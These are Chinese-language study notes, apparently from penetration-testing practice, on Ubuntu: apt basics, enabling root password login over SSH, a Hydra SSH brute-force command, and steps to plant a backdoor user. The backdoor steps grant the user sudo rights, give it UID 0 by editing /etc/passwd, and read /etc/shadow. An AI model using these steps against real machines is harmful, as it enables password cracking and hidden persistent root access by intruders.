Ubuntu 后面用户植入
包管理器:apt
Ubuntu(APT 命令)
apt update 刷新软件索引(获取最新可安装 / 更新列表)
apt upgrade 升级所有已安装的软件包
apt install <package_name> 安装指定软件(替换<package_name>为软件名)
apt remove <package_name> 删除指定软件包(保留配置文件)
apt list 列出所有可用软件包(已安装 / 可安装 / 可升级)
SSH安装与配置
apt install openssh-server 安装SSH服务
nano /etc/ssh/sshd_config 配置允许root用户远程密码登陆
修改配置文件:
• PermitRootLogin yes
• PasswordAuthentication yes
重启SSH服务
service ssh restart
Hydra
hydra -l 【用户名,如root】 -P 【密码字典路径】 【ssh://目标IP】 密码爆破
植入后门用户
useradd -m 【用户名】 新建用户
passwd 【用户名】 设置密码
配置sudo权限:
• nano /etc/sudoers 增加:
【用户名】 ALL=(ALL:ALL) ALL
赋予用户 sudo 权限 cat etc/group 查看 group
usermod -aG sudo QK -a 追加
设置用户root权限: 用nano更改
nano /etc/passwd
用 cat 查看:
/etc/passwd :用户基本信息
/etc/shadow :用户密码信息
root: x: 0: 0: root: /root: /bin/bash
用户名:密码:用户ID:组ID:用户说明:用户目录:命令解释器
用户(user)
root用户:UID=0,拥有最高权限
系统用户:UID 1-999(通常用于服务进程)
普通用户:UID ≥1000(手动创建的用户)
